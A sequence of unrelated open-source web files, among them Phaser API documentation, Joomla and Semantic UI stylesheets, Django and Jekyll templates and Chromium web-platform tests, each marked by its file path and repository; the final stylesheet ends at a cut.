<li class="class-depth-0">
<a href="global.html#RETROFONT">RETROFONT</a>
</li>
<li class="class-depth-0">
<a href="global.html#RIGHT">RIGHT</a>
</li>
<li class="class-depth-0">
<a href="global.html#ROPE">ROPE</a>
</li>
<li class="class-depth-0">
<a href="global.html#ROUNDEDRECTANGLE">ROUNDEDRECTANGLE</a>
</li>
<li class="class-depth-0">
<a href="global.html#scaleModes">scaleModes</a>
</li>
<li class="class-depth-0">
<a href="global.html#SPRITE">SPRITE</a>
</li>
<li class="class-depth-0">
<a href="global.html#SPRITEBATCH">SPRITEBATCH</a>
</li>
<li class="class-depth-0">
<a href="global.html#TEXT">TEXT</a>
</li>
<li class="class-depth-0">
<a href="global.html#TILEMAP">TILEMAP</a>
</li>
<li class="class-depth-0">
<a href="global.html#TILEMAPLAYER">TILEMAPLAYER</a>
</li>
<li class="class-depth-0">
<a href="global.html#TILESPRITE">TILESPRITE</a>
</li>
<li class="class-depth-0">
<a href="global.html#UP">UP</a>
</li>
<li class="class-depth-0">
<a href="global.html#VERSION">VERSION</a>
</li>
<li class="class-depth-0">
<a href="global.html#VIDEO">VIDEO</a>
</li>
<li class="class-depth-0">
<a href="global.html#WEBGL">WEBGL</a>
</li>
<li class="class-depth-0">
<a href="global.html#WEBGL_FILTER">WEBGL_FILTER</a>
</li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Core<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="Phaser.Game.html">Game</a></li>
<li class="class-depth-1"><a href="Phaser.Group.html">Group</a></li>
<li class="class-depth-1"><a href="Phaser.World.html">World</a></li>
<li class="class-depth-1"><a href="Phaser.Loader.html">Loader</a></li>
<li class="class-depth-1"><a href="Phaser.Cache.html">Cache</a></li>
<li class="class-depth-1"><a href="Phaser.Time.html">Time</a></li>
<li class="class-depth-1"><a href="Phaser.Camera.html">Camera</a></li>
<li class="class-depth-1"><a href="Phaser.StateManager.html">State Manager</a></li>
<li class="class-depth-1"><a href="Phaser.TweenManager.html">Tween Manager</a></li>
<li class="class-depth-1"><a href="Phaser.SoundManager.html">Sound Manager</a></li>
<li class="class-depth-1"><a href="Phaser.Input.html">Input Manager</a></li>
<li class="class-depth-1"><a href="Phaser.ScaleManager.html">Scale Manager</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Game Objects<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="Phaser.GameObjectFactory.html">Factory (game.add)</a></li>
<li class="class-depth-1"><a href="Phaser.GameObjectCreator.html">Creator (game.make)</a></li>
<li class="class-depth-1"><a href="Phaser.Sprite.html">Sprite</a></li>
<li class="class-depth-1"><a href="Phaser.Image.html">Image</a></li>
<li class="class-depth-1"><a href="Phaser.Sound.html">Sound</a></li>
<li class="class-depth-1"><a href="Phaser.Video.html">Video</a></li>
<li class="class-depth-1"><a href="Phaser.Particles.Arcade.Emitter.html">Particle Emitter</a></li>
<li class="class-depth-1"><a href="Phaser.Particle.html">Particle</a></li>
<li class="class-depth-1"><a href="Phaser.Text.html">Text</a></li>
<li class="class-depth-1"><a href="Phaser.Tween.html">Tween</a></li>
<li class="class-depth-1"><a href="Phaser.BitmapText.html">BitmapText</a></li>
<li class="class-depth-1"><a href="Phaser.Tilemap.html">Tilemap</a></li>
<li class="class-depth-1"><a href="Phaser.BitmapData.html">BitmapData</a></li>
<li class="class-depth-1"><a href="Phaser.RetroFont.html">RetroFont</a></li>
<li class="class-depth-1"><a href="Phaser.Button.html">Button</a></li>
<li class="class-depth-1"><a href="Phaser.Animation.html">Animation</a></li>
<li class="class-depth-1"><a href="Phaser.Graphics.html">Graphics</a></li>
<li class="class-depth-1"><a href="Phaser.RenderTexture.html">RenderTexture</a></li>
<li class="class-depth-1"><a href="Phaser.TileSprite.html">TileSprite</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Geometry<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="Phaser.Circle.html">Circle</a></li>
<li class="class-depth-1"><a href="Phaser.Ellipse.html">Ellipse</a></li>
<li class="class-depth-1"><a href="Phaser.Line.html">Line</a></li>
<li class="class-depth-1"><a href="Phaser.Matrix.html">Matrix</a></li>
<li class="class-depth-1"><a href="Phaser.Point.html">Point</a></li>
<li class="class-depth-1"><a href="Phaser.Polygon.html">Polygon</a></li>
<li class="class-depth-1"><a href="Phaser.Rectangle.html">Rectangle</a></li>
<li class="class-depth-1"><a href="Phaser.RoundedRectangle.html">Rounded Rectangle</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Physics<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="Phaser.Physics.Arcade.html">Arcade Physics</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.Arcade.Body.html">Body</a></li>
<li class="class-depth-1"><a href="Phaser.Physics.P2.html">P2 Physics</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.P2.Body.html">Body</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.P2.Spring.html">Spring</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.P2.CollisionGroup.html">CollisionGroup</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.P2.ContactMaterial.html">ContactMaterial</a></li>
<li class="class-depth-1"><a href="Phaser.Physics.Ninja.html">Ninja Physics</a></li>
<li class="class-depth-2"><a href="Phaser.Physics.Body.html">Body</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Input<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="Phaser.InputHandler.html">Input Handler</a></li>
<li class="class-depth-1"><a href="Phaser.Pointer.html">Pointer</a></li>
<li class="class-depth-1"><a href="Phaser.DeviceButton.html">Device Button</a></li>
<li class="class-depth-1"><a href="Phaser.Mouse.html">Mouse</a></li>
<li class="class-depth-1"><a href="Phaser.Keyboard.html">Keyboard</a></li>
<li class="class-depth-1"><a href="Phaser.Key.html">Key</a></li>
<li class="class-depth-1"><a href="Phaser.Gamepad.html">Gamepad</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Community<b class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1"><a href="http://phaser.io">Phaser Web Site</a></li>
<li class="class-depth-1"><a href="https://github.com/photonstorm/phaser">Phaser Github</a></li>
<li class="class-depth-1"><a href="http://phaser.io/examples">Phaser Examples</a></li>
<li class="class-depth-1"><a href="https://github.com/photonstorm/phaser-plugins">Phaser Plugins</a></li>
<li class="class-depth-1"><a href="http://www.html5gamedevs.com/forum/14-phaser/">Forum</a></li>
<li class="class-depth-1"><a href="http://stackoverflow.com/questions/tagged/phaser-framework">Stack Overflow</a></li>
<li class="class-depth-1"><a href="http://phaser.io/learn">Tutorials</a></li>
<li class="class-depth-1"><a href="https://confirmsubscription.com/h/r/369DE48E3E86AF1E">Newsletter</a></li>
<li class="class-depth-1"><a href="http://phaser.io/community/twitter">Twitter</a></li>
<li class="class-depth-1"><a href="http://phaser.io/community/irc">IRC</a></li>
<li class="class-depth-1"><a href="https://www.codeandweb.com/texturepacker/phaser">Texture Packer</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div class="row-fluid">
<div class="span12">
<div id="main">
<h1 class="page-title">Source: src/pixi/renderers/canvas/utils/CanvasMaskManager.js</h1>
<section>
<article>
<pre class="sunlight-highlight-javascript linenums">/**
* @author Mat Groves http://matgroves.com/ @Doormat23
*/
/**
* A set of functions used to handle masking.
*
* @class CanvasMaskManager
* @constructor
*/
PIXI.CanvasMaskManager = function()
{
};
PIXI.CanvasMaskManager.prototype.constructor = PIXI.CanvasMaskManager;
/**
* This method adds it to the current stack of masks.
*
* @method pushMask
* @param maskData {Object} the maskData that will be pushed
* @param renderSession {Object} The renderSession whose context will be used for this mask manager.
*/
PIXI.CanvasMaskManager.prototype.pushMask = function(maskData, renderSession)
{
var context = renderSession.context;
context.save();
var cacheAlpha = maskData.alpha;
var transform = maskData.worldTransform;
var resolution = renderSession.resolution;
context.setTransform(transform.a * resolution,
transform.b * resolution,
transform.c * resolution,
transform.d * resolution,
transform.tx * resolution,
transform.ty * resolution);
PIXI.CanvasGraphics.renderGraphicsMask(maskData, context);
context.clip();
maskData.worldAlpha = cacheAlpha;
};
/**
* Restores the current drawing context to the state it was before the mask was applied.
*
* @method popMask
* @param renderSession {Object} The renderSession whose context will be used for this mask manager.
*/
PIXI.CanvasMaskManager.prototype.popMask = function(renderSession)
{
renderSession.context.restore();
};
</pre>
</article>
</section>
</div>
<div class="clearfix"></div>
<footer>
<span class="copyright">
Phaser Copyright © 2012-2015 Photon Storm Ltd.
</span>
<br />
<span class="jsdoc-message">
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.3.0-alpha10</a>
on Wed Jul 29 2015 14:57:51 GMT+0100 (GMT Daylight Time) using the <a href="https://github.com/terryweiss/docstrap">DocStrap template</a>.
</span>
</footer>
</div>
<br clear="both">
</div>
</div>
<script src="scripts/sunlight.js"></script>
<script src="scripts/sunlight.javascript.js"></script>
<script src="scripts/sunlight-plugin.doclinks.js"></script>
<script src="scripts/sunlight-plugin.linenumbers.js"></script>
<script src="scripts/sunlight-plugin.menu.js"></script>
<script src="scripts/jquery.min.js"></script>
<script src="scripts/jquery.scrollTo.js"></script>
<script src="scripts/jquery.localScroll.js"></script>
<script src="scripts/bootstrap-dropdown.js"></script>
<script src="scripts/toc.js"></script>
<script> Sunlight.highlightAll({lineNumbers:true, showMenu: true, enableDoclinks :true}); </script>
<script>
$( function () {
$( "#toc" ).toc( {
anchorName : function(i, heading, prefix) {
return $(heading).attr("id") || ( prefix + i );
},
selectors : "h1,h2,h3,h4",
showAndHide : false,
scrollTo : 60
} );
$( "#toc>ul" ).addClass( "nav nav-pills nav-stacked" );
$( "#main span[id^='toc']" ).addClass( "toc-shim" );
} );
</script>
</body>
</html>
|
media/system/css/fields/calendar.css
|
IOC/joomla3
|
/**
* @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
.js-calendar {
box-shadow: 0 0 15px 4px rgba(0,0,0,.15) !important;
}
.calendar-container {
float: left;
min-width: 160px;
padding: 0;
list-style: none;
border-radius: 5px;
background-color: #ffffff !important;
z-index: 1100 !important;
}
.calendar-container table {
table-layout: fixed;
max-width: 262px;
border-radius: 5px;
background-color: #ffffff !important;
z-index: 1100 !important;
}
/* The main calendar widget. DIV containing a table. */
div.calendar-container table th, .calendar-container table td {
padding: 8px 0;
line-height: 1.1em;
text-align: center;
}
div.calendar-container table body td {
line-height: 2em;
}
div.calendar-container table td.title { /* This holds the current "month, year" */
vertical-align: middle;
text-align: center;
}
.calendar-container table thead td.headrow { /* Row <TR> containing navigation buttons */
background: #fff;
color: #000;
}
.calendar-container table thead td.name { /* Cells <TD> containing the day names */
border-bottom: 1px solid #fff;
text-align: center;
color: #000;
}
.calendar-container table thead td.weekend { /* How a weekend day name shows in header */
color: #999;
}
/* The body part -- contains all the days in month. */
.calendar-container table tbody td.day { /* Cells <TD> containing month days dates */
text-align: right;
}
.calendar-container table tbody td.wn {
background: #fff;
}
.calendar-container table tbody td.weekend { /* Cells showing weekend days */
color: #999;
}
.calendar-container table tbody td.hilite { /* Hovered cells <TD> */
background: #999999;
color: #ffffff;
}
.calendar-container table tbody td.day {
border: 0;
cursor : pointer;
font-size: 12px;
min-width: 38px;
}
.calendar-container table tbody td.day.wn {
text-align: center;
background-color: #f4f4f4;
}
.calendar-container table tbody td.day.selected { /* Cell showing today date */
background: #3071a9;
color: #fff;
border: 0;
}
.calendar-container table tbody td.today {
position: relative;
height: 100%;
width: auto;
font-weight: bold;
}
.calendar-container table tbody td.today:after {
position: absolute;
bottom: 3px;
left: 3px;
right: 3px;
content: "";
height: 3px;
border-radius: 1.5px;
background-color: #46a546;
}
.calendar-container table tbody td.today.selected:after {
background-color: #fff;
}
.calendar-container table tbody td.day:hover {
cursor: pointer;
background: #3d8fd7;
color: #fff;
}
.calendar-container table tbody td.day:hover:after {
background-color: #fff;
}
.calendar-container table tbody .disabled {
color: #999;
background-color: #fafafa;
}
.calendar-container table tbody .emptycell { /* Empty cells (the best is to hide them) */
visibility: hidden;
}
.calendar-container table tbody .emptyrow { /* Empty row (some months need less than 6 rows) */
display: none;
}
.buttons-wrapper {
padding: 5px 5px;
}
a.js-btn.btn.btn-exit, a.js-btn.btn.btn-today, a.js-btn.btn.btn-clear {
cursor: pointer;
text-decoration: none;
min-width: 60px;
}
.calendar-container .calendar-head-row td {
padding: 4px 0 !important;
}
.calendar-container .day-name {
font-size: 0.7rem;
font-weight: bold;
}
.calendar-container .time td {
padding: 8px 0 8px 8px;
}
.time .time-title {
background-image: url("data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAdlJREFUeNqklUsohFEUx7/5kgWGjEcRJULJSmJhITQLr8UoFko2k2SDLGZD2SglJcXOxo6Fx0ayUt4jWXgNG2rIwsgMJZPn/+o/dRvfa8yp33zfPfecM+e795x7bYqxtIAaUA2KgA3cgn3gBcsgrMQg3eAAfJtwBYa0Atg0dAugg+/3YAUcgkvqCkAVcIIy6raBCwT0/mRdymYG5Bt8VQoYBe+0Pwdpik6mwuAVNMawbJXgmr7e6FVokzKt1XBOZnYuneB54Jn+w/LEMZXTOo65nN80yNxNmyBIF4o6Ku6AXccpmzbzJstyQbs+FT/1VC6CFyU+mePTqbIBhBwp8csGn8UqO0qIz8AhstNBk8BP4As4RGCVyk8LgUVVlFvIXFXZ+4qUuZY8gn6W1QmYBKkadklM9PfLJriTYxYyEYFXpZp3s8Yj0kv9mhi0cuCTlsVMuqRWbpL0Xuo8YpAotaQnhgoQSzEAMjhuZoywfMb0UCmyKP1HmSXzJBQxpqIn9zhxA0piCJoFdqXu/bOpmeCMBiF+ZoJJ0E7gp0/AKCF71M1xCkZ4NRWSCjAIdiQ7v9UlHAcPUdfQh1QJEd7ArOg0K1dTRHJAO2hg8zhoH2IVbYElvaPgR4ABAFM/gtHnpJfxAAAAAElFTkSuQmCC");
background-repeat: no-repeat;
background-position: center;
}
|
sdk/android/src/sdk/doc/com/microsoft/windowsazure/mobileservices/table/sync/synchandler/package-frame.html
|
paulbatum/azure-mobile-services
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_11) on Tue Aug 12 11:16:05 PDT 2014 -->
<title>com.microsoft.windowsazure.mobileservices.table.sync.synchandler</title>
<meta name="date" content="2014-08-12">
<link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../../script.js"></script>
</head>
<body>
<h1 class="bar"><a href="../../../../../../../com/microsoft/windowsazure/mobileservices/table/sync/synchandler/package-summary.html" target="classFrame">com.microsoft.windowsazure.mobileservices.table.sync.synchandler</a></h1>
<div class="indexContainer">
<h2 title="Interfaces">Interfaces</h2>
<ul title="Interfaces">
<li><a href="MobileServiceSyncHandler.html" title="interface in com.microsoft.windowsazure.mobileservices.table.sync.synchandler" target="classFrame"><span class="interfaceName">MobileServiceSyncHandler</span></a></li>
</ul>
<h2 title="Classes">Classes</h2>
<ul title="Classes">
<li><a href="SimpleSyncHandler.html" title="class in com.microsoft.windowsazure.mobileservices.table.sync.synchandler" target="classFrame">SimpleSyncHandler</a></li>
</ul>
<h2 title="Exceptions">Exceptions</h2>
<ul title="Exceptions">
<li><a href="MobileServiceSyncHandlerException.html" title="class in com.microsoft.windowsazure.mobileservices.table.sync.synchandler" target="classFrame">MobileServiceSyncHandlerException</a></li>
</ul>
</div>
</body>
</html>
|
waliki_project/waliki_project/templates/allauth/account/logout.html
|
fpytloun/waliki
|
{% extends "account/base.html" %}
{% load url from future %}
{% load i18n %}
{% block head_title %}{% trans "Sign Out" %}{% endblock %}
{% block content %}
<h1>{% trans "Sign Out" %}</h1>
<p>{% trans 'Are you sure you want to sign out?' %}</p>
<form method="post" action="{% url 'account_logout' %}">
{% csrf_token %}
{% if redirect_field_value %}
<input type="hidden" name="{{redirect_field_name}}" value="{{redirect_field_value}}"/>
{% endif %}
<button class="btn btn-primary" type="submit">{% trans 'Sign Out' %}</button>
</form>
{% endblock %}
|
third_party/blink/web_tests/external/wpt/shadow-dom/event-on-pseudo-element-crash.html
|
chromium/chromium
|
<!DOCTYPE html>
<meta charset="utf-8">
<link rel="author" href="mailto:masonf@chromium.org">
<link rel="help" href="https://crbug.com/1180286">
<meta name="assert" content="The renderer should not crash.">
<span>This test passes if the renderer does not crash.</span>
<div>
<option></option>
</div>
<style>
div {
direction: rtl;
zoom: 0.01;
}
option {
zoom: 5;
}
option::before {
display: table-caption;
overflow: scroll;
content: open-quote;
padding-right: 1px;
-webkit-column-width: 1px;
}
</style>
|
third_party/blink/web_tests/external/wpt/css/css-text-decor/reference/text-decoration-thickness-from-font-variable-ref.html
|
nwjs/chromium.src
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CSS Text Decoration Test: text-decoration-thickness respects variable font properties</title>
<link rel="help" href="https://drafts.csswg.org/css-text-decor-4/#text-decoration-width-property">
<meta name="assert" content="text-decoration-thickness from-font respects MVAR table of variable fonts for variable metrics">
<link rel="author" title="Dominik Röttsches" href="mailto:drott@chromium.org">
<style>
@font-face {
font-family: underline-thin;
src: url(../resources/UnderlineTest-Thin.ttf);
}
@font-face {
font-family: underline-thick;
src: url(../resources/UnderlineTest-Thick.ttf);
}
.test {
text-underline-position: from-font;
font-size: 64px;
line-height: 1.8;
}
.thin_underline {
text-decoration: underline;
font-family: underline-thin;
text-decoration-thickness: from-font;
}
.thick_underline {
text-decoration: underline;
font-family: underline-thick;
text-decoration-thickness: from-font;
}
</style>
</head>
<body>
<p>Test passes if the underline on the first line is thin and thick on the second line.</p>
<div class="test"><span class="thin_underline">aagaa</span></div>
<div class="test"><span class="thick_underline">aagaa</span></div>
</body>
</html>
|
third_party/blink/web_tests/external/wpt/css/css-images/object-fit-scale-down-png-001i.html
|
scheib/chromium
|
<!DOCTYPE html>
<!--
Any copyright is dedicated to the Public Domain.
http://creativecommons.org/publicdomain/zero/1.0/
-->
<html>
<head>
<meta charset="utf-8">
<title>CSS Test: 'object-fit: scale-down' on img element, with a PNG image and with various 'object-position' values</title>
<link rel="author" title="Daniel Holbert" href="mailto:dholbert@mozilla.com">
<link rel="help" href="http://www.w3.org/TR/css3-images/#sizing">
<link rel="help" href="http://www.w3.org/TR/css3-images/#the-object-fit">
<link rel="help" href="http://www.w3.org/TR/css3-images/#the-object-position">
<link rel="match" href="object-fit-scale-down-png-001-ref.html">
<style type="text/css">
img {
border: 1px dashed gray;
padding: 1px;
object-fit: scale-down;
image-rendering: crisp-edges;
float: left;
}
.bigWide {
width: 48px;
height: 32px;
}
.bigTall {
width: 32px;
height: 48px;
}
.small {
width: 8px;
height: 8px;
}
br { clear: both; }
.tr { object-position: top right }
.bl { object-position: bottom left }
.tl { object-position: top 25% left 25% }
.br { object-position: bottom 1px right 2px }
.tc { object-position: top 3px left 50% }
.cr { object-position: top 50% right 25% }
</style>
</head>
<body>
<!-- big/wide: -->
<img src="support/colors-16x8.png" class="bigWide tr">
<img src="support/colors-16x8.png" class="bigWide bl">
<img src="support/colors-16x8.png" class="bigWide tl">
<img src="support/colors-16x8.png" class="bigWide br">
<img src="support/colors-16x8.png" class="bigWide tc">
<img src="support/colors-16x8.png" class="bigWide cr">
<img src="support/colors-16x8.png" class="bigWide">
<br>
<!-- big/tall: -->
<img src="support/colors-16x8.png" class="bigTall tr">
<img src="support/colors-16x8.png" class="bigTall bl">
<img src="support/colors-16x8.png" class="bigTall tl">
<img src="support/colors-16x8.png" class="bigTall br">
<img src="support/colors-16x8.png" class="bigTall tc">
<img src="support/colors-16x8.png" class="bigTall cr">
<img src="support/colors-16x8.png" class="bigTall">
<br>
<!-- small: -->
<img src="support/colors-16x8.png" class="small tr">
<img src="support/colors-16x8.png" class="small bl">
<img src="support/colors-16x8.png" class="small tl">
<img src="support/colors-16x8.png" class="small br">
<img src="support/colors-16x8.png" class="small tc">
<img src="support/colors-16x8.png" class="small cr">
<img src="support/colors-16x8.png" class="small">
<br>
</body>
</html>
|
docs/_layouts/post.html
|
SzwedzikPL/ACE3
|
---
layout: compress
---
{% include _header.html %}
<main>
<div class="row">
<div class="medium-8 columns">
<a href="{{site.baseUrl}}/news.html" class="button tiny"><i class="fa fa-chevron-left"></i> Back</a><br/>
<article class="post" itemscope itemtype="http://schema.org/BlogPosting">
<header>
<h1 itemprop="headline name">{{ page.title }}</h1>
<div class="meta">
<time itemprop="datePublished" content="{{ page.date | date: '%Y-%m-%d'}}">{{ page.date | date: "%Y-%m-%d"}}</time>
by <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name">{{ page.author }}</span></span>
</div>
</header>
<div itemprop="articleBody">
{{ content }}
</div>
</article>
</div>
<div class="medium-4 columns">
</div>
</div>
</main>
{% include _footer.html %}
|
third_party/WebKit/LayoutTests/imported/wpt/FileAPI/reading-data-section/FileReader-multiple-reads.html
|
axinging/chromium-crosswalk
|
<!DOCTYPE html>
<title>FileReader: starting new reads while one is in progress</title>
<link rel="author" title="Yinkan Li" href="mailto:liyinkan.biz@gmail.com">
<link rel="help" href="http://dev.w3.org/2006/webapi/FileAPI/#MultipleReads">
<script src="../../../../resources/testharness.js"></script>
<script src="../../../../resources/testharnessreport.js"></script>
<div id="log"></div>
<script>
test(function() {
var blob_1 = new Blob(['TEST000000001'])
var blob_2 = new Blob(['TEST000000002'])
var reader = new FileReader();
reader.readAsText(blob_1)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
assert_throws("InvalidStateError", function () {
reader.readAsText(blob_2)
})
}, 'test FileReader InvalidStateError exception for readAsText');
test(function() {
var blob_1 = new Blob(['TEST000000001'])
var blob_2 = new Blob(['TEST000000002'])
var reader = new FileReader();
reader.readAsDataURL(blob_1)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
assert_throws("InvalidStateError", function () {
reader.readAsDataURL(blob_2)
})
}, 'test FileReader InvalidStateError exception for readAsDataURL');
test(function() {
var blob_1 = new Blob(['TEST000000001'])
var blob_2 = new Blob(['TEST000000002'])
var reader = new FileReader();
reader.readAsArrayBuffer(blob_1)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
assert_throws("InvalidStateError", function () {
reader.readAsArrayBuffer(blob_2)
})
}, 'test FileReader InvalidStateError exception for readAsArrayBuffer');
async_test(function() {
var blob_1 = new Blob(['TEST000000001'])
var blob_2 = new Blob(['TEST000000002'])
var reader = new FileReader();
var triggered = false;
reader.onloadstart = this.step_func_done(function() {
assert_false(triggered, "Only one loadstart event should be dispatched");
triggered = true;
assert_equals(reader.readyState, FileReader.LOADING,
"readyState must be LOADING")
assert_throws("InvalidStateError", function () {
reader.readAsArrayBuffer(blob_2)
})
});
reader.readAsArrayBuffer(blob_1)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
}, 'test FileReader InvalidStateError exception in onloadstart event for readAsArrayBuffer');
async_test(function() {
var blob_1 = new Blob(['TEST000000001'])
var blob_2 = new Blob(['TEST000000002'])
var reader = new FileReader();
reader.onloadend = this.step_func_done(function() {
assert_equals(reader.readyState, FileReader.LOADING,
"readyState must be LOADING")
reader.readAsArrayBuffer(blob_2)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
});
reader.readAsArrayBuffer(blob_1)
assert_equals(reader.readyState, FileReader.LOADING, "readyState Must be LOADING")
}, 'test FileReader no InvalidStateError exception in onloadstart event for readAsArrayBuffer');
</script>
|
src/main/java/org/newdawn/slick/svg/package.html
|
TomyLobo/Slick
|
<BODY>
Demo/Test SVG area. Tiny line is integrated to render-to-texture - however a full implementation is
to follow rendering SVG to OpenGL geometric shapes.
</BODY>
|
files/blazecss/3.2.1/utilities.elevation.min.css
|
Asaf-S/jsdelivr
|
/*!v3.2.1*/.u-high,.u-higher,.u-highest{border:0}.u-high{box-shadow:0 0 1px hsla(0,0%,7%,.6),0 5px 10px -3px hsla(0,0%,7%,.4)}.u-higher{box-shadow:0 0 1px hsla(0,0%,7%,.6),0 10px 25px -4px hsla(0,0%,7%,.4)}.u-highest{box-shadow:0 0 1px hsla(0,0%,7%,.6),0 20px 55px -8px hsla(0,0%,7%,.4)}
|
ajax/libs/semantic-ui/1.11.1/components/progress.css
|
wackyapples/cdnjs
|
/*!
* # Semantic UI 1.11.1 - Progress Bar
* http://github.com/semantic-org/semantic-ui/
*
*
* Copyright 2014 Contributorss
* Released under the MIT license
* http://opensource.org/licenses/MIT
*
*/
/*******************************
Progress
*******************************/
.ui.progress {
position: relative;
display: block;
max-width: 100%;
border: 1px solid rgba(39, 41, 43, 0.15);
margin: 1em 0em 2.5em;
box-shadow: none;
background: rgba(0, 0, 0, 0.03);
padding: 0.2857em;
border-radius: 0.2857rem;
}
.ui.progress:first-child {
margin: 0em 0em 2.5em;
}
.ui.progress:last-child {
margin: 0em 0em 1.5em;
}
/* Indicating */
.ui.indicating.progress .bar[style*="width: 1"],
.ui.indicating.progress .bar[style*="width: 2"] {
background-color: #d95c5c;
}
.ui.indicating.progress .bar[style*="width: 3"] {
background-color: #d9a65c;
}
.ui.indicating.progress .bar[style*="width: 4"],
.ui.indicating.progress .bar[style*="width: 5"] {
background-color: #e6bb48;
}
.ui.indicating.progress .bar[style*="width: 6"] {
background-color: #ddc928;
}
.ui.indicating.progress .bar[style*="width: 7"],
.ui.indicating.progress .bar[style*="width: 8"] {
background-color: #b4d95c;
}
.ui.indicating.progress .bar[style*="width: 9"],
.ui.indicating.progress .bar[style*="width: 100"] {
background-color: #66da81;
}
/* Indicating Label */
.ui.indicating.progress[data-percent^="1"] .label,
.ui.indicating.progress[data-percent^="2"] .label {
color: #d95c5c;
}
.ui.indicating.progress[data-percent^="3"] .label {
color: #d9a65c;
}
.ui.indicating.progress[data-percent^="4"] .label,
.ui.indicating.progress[data-percent^="5"] .label {
color: #e6bb48;
}
.ui.indicating.progress[data-percent^="6"] .label {
color: #ddc928;
}
.ui.indicating.progress[data-percent^="7"] .label,
.ui.indicating.progress[data-percent^="8"] .label {
color: #b4d95c;
}
.ui.indicating.progress[data-percent^="9"] .label,
.ui.indicating.progress[data-percent^="100"] .label {
color: #66da81;
}
/* Single Digits */
.ui.indicating.progress .bar[style^="width: 1%"],
.ui.indicating.progress .bar[style^="width: 2%"],
.ui.indicating.progress .bar[style^="width: 3%"],
.ui.indicating.progress .bar[style^="width: 4%"],
.ui.indicating.progress .bar[style^="width: 5%"],
.ui.indicating.progress .bar[style^="width: 6%"],
.ui.indicating.progress .bar[style^="width: 7%"],
.ui.indicating.progress .bar[style^="width: 8%"],
.ui.indicating.progress .bar[style^="width: 9%"] {
background-color: #d95c5c;
}
.ui.indicating.progress[data-percent="1"] .label,
.ui.indicating.progress[data-percent="2"] .label,
.ui.indicating.progress[data-percent="3"] .label,
.ui.indicating.progress[data-percent="4"] .label,
.ui.indicating.progress[data-percent="5"] .label,
.ui.indicating.progress[data-percent="6"] .label,
.ui.indicating.progress[data-percent="7"] .label,
.ui.indicating.progress[data-percent="8"] .label,
.ui.indicating.progress[data-percent="9"] .label {
color: #d95c5c;
}
/* Indicating Success */
.ui.indicating.progress.success .label {
color: #356e36;
}
/*******************************
Content
*******************************/
/* Activity Bar */
.ui.progress .bar {
display: block;
line-height: 1;
position: relative;
width: 0%;
min-width: 2em;
background: #888888;
border-radius: 0.2857rem;
-webkit-transition: width 0.3s ease, background-color 0.3s ease;
transition: width 0.3s ease, background-color 0.3s ease;
}
/* Percent Complete */
.ui.progress .bar > .progress {
white-space: nowrap;
position: absolute;
width: auto;
font-size: 0.9em;
top: 50%;
right: 0.5em;
left: auto;
bottom: auto;
color: rgba(255, 255, 255, 0.8);
text-shadow: none;
margin-top: -0.5em;
font-weight: bold;
text-align: left;
}
/* Label */
.ui.progress > .label {
position: absolute;
width: 100%;
font-size: 1em;
top: 100%;
right: auto;
left: 0%;
bottom: auto;
color: rgba(0, 0, 0, 0.8);
font-weight: bold;
text-shadow: none;
margin-top: 0.2em;
text-align: center;
-webkit-transition: color 0.4s ease;
transition: color 0.4s ease;
}
/*******************************
States
*******************************/
/*--------------
Success
---------------*/
.ui.progress.success .bar {
background-color: #5bbd72 !important;
}
.ui.progress.success .bar,
.ui.progress.success .bar::after {
-webkit-animation: none !important;
animation: none !important;
}
.ui.progress.success > .label {
color: #356e36;
}
/*--------------
Warning
---------------*/
.ui.progress.warning .bar {
background-color: #f2c037 !important;
}
.ui.progress.warning .bar,
.ui.progress.warning .bar::after {
-webkit-animation: none !important;
animation: none !important;
}
.ui.progress.warning > .label {
color: #825c01;
}
/*--------------
Error
---------------*/
.ui.progress.error .bar {
background-color: #d95c5c !important;
}
.ui.progress.error .bar,
.ui.progress.error .bar::after {
-webkit-animation: none !important;
animation: none !important;
}
.ui.progress.error > .label {
color: #912d2b;
}
/*--------------
Active
---------------*/
.ui.active.progress .bar {
position: relative;
min-width: 2em;
}
.ui.active.progress .bar::after {
content: '';
opacity: 0;
position: absolute;
top: 0px;
left: 0px;
right: 0px;
bottom: 0px;
